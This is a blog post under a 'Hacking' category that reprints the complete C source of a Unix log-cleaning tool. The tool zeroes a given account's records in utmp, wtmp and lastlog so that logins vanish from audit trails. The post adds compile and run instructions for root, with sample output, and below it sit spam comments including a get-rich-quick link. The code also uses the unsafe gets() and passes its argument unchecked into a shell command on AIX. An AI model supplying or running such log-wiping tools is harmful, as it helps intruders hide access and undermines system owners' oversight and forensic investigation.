Parfum Shop's Blog

You come when you need, away when you get

Clear login log or lastlog linux and unix.

By • Feb 15th, 2010 • Category: Hacking

Universal utmp, wtmp, and lastlog editor. Actually
removes, doesn’t leave holes…

/*Compile “cc -o remove remove.c -DGENERIC” and run
as root. Use -DAIX instead of -DGENERIC for an AIX
machine. Use -DSCO instead of -DGENERIC for a SCO
machine.
*/

#include
#include
#include
#include
#include
#ifndef AIX
#include
#else
#include
#endif
#include

#ifdef AIX
#define WTMP "/var/log/wtmp"
#define UTMP "/etc/utmp"
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */
/* handled a bit differently. */
char LogParam[7][30]=
{
"time_last_login=","tty_last_login=","host_last_login=",
"unsuccessful_login_count=","time_last_unsuccessful_login=",
"tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef SCO
#define WTMP "/etc/wtmp" /* wtmp was here on the SCO box I accessed */
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif
#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/log/wtmp"
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif

void main(argc,argv)
int argc;
char *argv[];
{
int cleanWtmp(char *,int);
int cleanUtmp(char *,int);
int cleanLastlog(char *);
int getCount(char *,char *);
char line[10];
int killem, firstcnt, t;

if(argc!=2)
{
printf("Usage: %s acct\n",argv[0]);
exit(0);
}
firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */
printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1999\n\n")
;
printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);
printf("Will attempt a lastlog cleanup by default.\n\n");
printf("# - remove last # records from utmp/wtmp\n");
printf("a - remove (a)ll records from utmp/wtmp\n");
printf("q - (q)uit program\n\n");
printf("Enter selection -> ");
gets(line);
if(line[0]==0x51 || line[0]==0x71) exit(0);
if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
else killem=atoi(line);
if (killem>firstcnt)
{
printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);
exit(-1);
}
t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */
if (t==1) {
printf("Trouble cleaning up %s.\n",WTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);
t=cleanUtmp(argv[1],killem);
if (t==1) {
printf("Trouble cleaning up %s.\n",UTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);
t=cleanLastlog(argv[1]); /* Make our attempt at lastlog */
if (t==1) {
printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);
}
printf("REMOVE cleaned up %s\n",LASTLOG);
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */
char *fname, *acct;
{
struct utmp utmp_ent;
int f,cnt=0;

if((f=open(fname,O_RDWR))>=0){
while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct
,strlen(acct)))cnt++;
}
close(f);
return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
struct utmp utmp_ent;
int fd,count=0;
if((fd=open(WTMP,O_RDWR))>=0){
while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct
,strlen(acct)))count++;
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
count--;
if(count+1<=killem){
bzero((char *)&utmp_ent,sizeof(utmp_ent));
lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
write(fd,&utmp_ent,sizeof(utmp_ent));
killem--;
}
}
}
close(fd);
}
else return(1);
} /* end cleanWtmp */

int cleanUtmp(acct,killem)
char *acct;
int killem;
{
struct utmp utmp_ent;
int fd;
if((fd=open(UTMP,O_RDWR))>=0){
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
if(killem>0){
bzero((char *)&utmp_ent,sizeof(utmp_ent));
lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
write(fd,&utmp_ent,sizeof(utmp_ent));
killem--;
}
}
}
close(fd);
}
else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
int t,i;
char entry[200];
for (i=0;i<7;i++)
{
sprintf(entry,"chsec -f %s -s %s -a %s>/dev/null",LASTLOG,acct,LogParam[i])
;
t=system(entry);
printf("Return code for %s is %d\n",LogParam[i],t);
}
#else /* Normal binary lastlog cleanup */
struct passwd *pwd;
struct lastlog logit;
int f;
if((pwd=getpwnam(acct))){
if((f=open(LASTLOG,O_RDWR))>=0){
lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
bzero((char *)&logit,sizeof(logit));
write(f,(char *)&logit,sizeof(logit));
close(f);
}
}
else return(1);
#endif
}
/* end cleanLastlog */

#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP “/var/adm/wtmp”
#define UTMP “/var/adm/utmp”
#define LASTLOG “/var/adm/lastlog”
#endif

PLease change and correct this:
#define WTMP “/var/log/wtmp”
#define UTMP “/var/run/utmp”
#define LASTLOG “/var/log/lastlog”

You can use this command:
find / -name wtmp -print
whereis wtmp

Then compile remove.c
#gcc remove.c -o remove -DGENERIC
remove.c: In function `main’:
remove.c:50: warning: return type of `main’ is not `int’
/tmp/ccZVzySI.o: In function `main’:
/tmp/ccZVzySI.o(.text+0xb4): the `gets’ function is dangerous and should
not be used.

Ignore this warning.
#./remove root

Found 549 record(s) for user cbug
Will attempt a lastlog cleanup by default.

# – remove last # records from utmp/wtmp
a – remove (a)ll records from utmp/wtmp
q – (q)uit program

Enter selection ->
chose (#) or (a) for clear all record.

is
Email this author | All posts by

4 Responses »

  1. http://webdesign-boston.com/ on January 10th, 2011 at 11:58 am:

    “Affordable Webdesign Doesn’t Mean Compromise”…

    THE BEST SERVICE EVER AND MY SITE DIDN’T COST ME A FORTUNE….

  2. SHOP ELECTRONICS!!! on January 16th, 2011 at 6:59 am:

    MOST INFORMATIVE SITE FOR ELECTRONICS….

    **YOUTUBE VIDEO REVIEWS ON THE HOTTEST ELECTRONICS OUT**…

  3. Samella Jex on August 21st, 2011 at 7:25 am:

    Hey! My family really adore your website! I didn’t locate a contact page so I hope you don’t mind me reaching you here. Hmmm, I ran across an awesome idea for your unique website :) . I’m an internet marketer (for a while) and I spend a lot of time making and reading websites like Parfum Shop's Blog
    » Hacking

    » Clear login log or lastlog linux and unix. all day. Times are hard and I was only making a few dollars here and there from google adsense but i discovered something SO much more powerful and better. I *swear* I made $351.76 $$CASH$$ in the last few hours after optimizing my blogs with a simple little code. Here is where I learned all my tricks: http://sn.im/bankbigonlinechecks Just giving your site a look I can tell you’ll probably pull in a few hundred bucks a month if you modify just a little code. I hope that it serves you well and you have all my blessings. Cheers! Samella Jex

  4. Adrienne Hartlein on September 2nd, 2011 at 12:51 pm:

    Thanks , I’ve just been looking for information about this subject for ages and yours is the best I’ve discovered till now. But, what about the bottom line? Are you sure about the source?

Leave a Reply